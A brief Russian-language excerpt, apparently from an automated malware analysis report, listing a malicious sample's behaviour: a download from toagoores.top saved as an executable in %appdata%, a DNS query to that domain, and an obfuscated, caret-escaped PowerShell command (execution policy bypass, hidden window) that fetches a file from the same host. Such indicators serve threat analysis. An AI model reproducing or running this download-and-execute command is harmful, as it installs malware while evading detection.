Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poWERsHE^LL^.exE -ex^ecU^tIo^Np^O^LICy^ B^y^Pas^s -no^Pr^ofI^le -WiN^Dowst^ylE hIDdEn^ (NeW-^oB^JE^cT^ syStE^M^.^Net.we^b^CLiEnT).^DoWNl^O^aDFiL^e('http://toagoores.top/read.ph...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "poWERsHE^LL^.exE -ex^ecU^tIo^Np^O^LICy^ B^y^Pas^s -no^Pr^ofI^le -WiN^Dowst^ylE hIDdEn^ (NeW-^oB^JE^cT^ syStE^M^.^Net.we^b^CLiEnT).^DoWNl^O^aDFiL^e('http://toagoores.top/read.ph...' (со скрытым окном)